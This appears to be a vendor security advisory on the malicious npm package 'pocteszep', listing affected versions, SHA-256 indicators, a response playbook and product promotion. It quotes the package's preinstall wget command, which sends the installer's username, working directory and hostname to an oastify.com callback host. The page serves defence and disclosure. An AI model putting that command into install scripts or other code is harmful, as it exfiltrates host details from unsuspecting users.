Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

pocteszepnpm

Malicious code in pocteszep (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5544
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall pocteszep

What this malware does

The package's npm preinstall lifecycle script runs wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)" (package.json line 8). On npm install, before any code review, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain — a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any installer pulling this package via name-collision with an internal dependency leaks host identity to the attacker.

The OpenSSF Package Analysis project identified 'pocteszep' @ 1.0.2 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

  • The package executes one or more commands associated with malicious behavior.

Malicious versions

7 flagged
1.0.01.0.11.0.21.0.41.0.51.0.81.1.1

Indicators of compromise (SHA-256)

0928ae3dd121de41479d98b831bdff705eb1e0e5960a60863c22fc844749fdae
49e809bf95413ac0d2235c8a4abf33b3b2121af7e3b8fc2393e077c04ae28fdc
a469c97969991b78ee0e28cc8e4a43d14750da0d4e3d4519f6e21263c9143a8f
c146870dfd2759e9e7b37a0c37783c40dbc35ebbf4e2145c1763dacc0b1d9e9f
c559e1ff2e96350c1eb7bc1c091c250b5860a7712fa7b99bbfb8762910190af7
e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d
f0ba0d9e403509d779b0247843e7f8994a4caae4b7fe43f41192ff708a07d4cf
1724503cde62bd3c17ba606fd752f088dfb2b1c41ae612ef5074f93e9896ee00
384556848b90af0dc3c06aef498f7c87a97a47c2491454a572ac1a79b197bd14
6c17d0010de4934b20768fdda3f2a6001bfadb3f0e5641a089bd76e40d76a545
818829f44b80e58e20516cb4ebb5945e3fe8ab8d1118b23224c0f9b116fa5e16
8744fc71275199a30d2b5559e2f3013e057e4ae859cce0bba676bfd0a9da6e72
f84a31af681abb09ee482c9bc1ed642077c36f2e92d1d62325d66a6ca2aabded

Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for pocteszep (7 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging pocteszep across your stack and pipelines.

  2. If you installed it — respond

    pocteszep is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If pocteszep was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks pocteszep before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. pocteszep on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2, 1.0.4, 1.0.5, 1.0.8, 1.1.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005379IN-MAL-2026-005356IN-MAL-2026-005380IN-MAL-2026-005378IN-MAL-2026-005366IN-MAL-2026-005381IN-MAL-2026-005355IN-MAL-2026-005367IN-MAL-2026-005383IN-MAL-2026-005384IN-MAL-2026-005382

References

Credits

  • Amazon Inspector · finder
  • OpenSSF: Package Analysis · finder

Detect & block this

O3 blocks pocteszep-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Explore

pocteszep (npm) malicious package — MAL-2026-5544 | O3 Security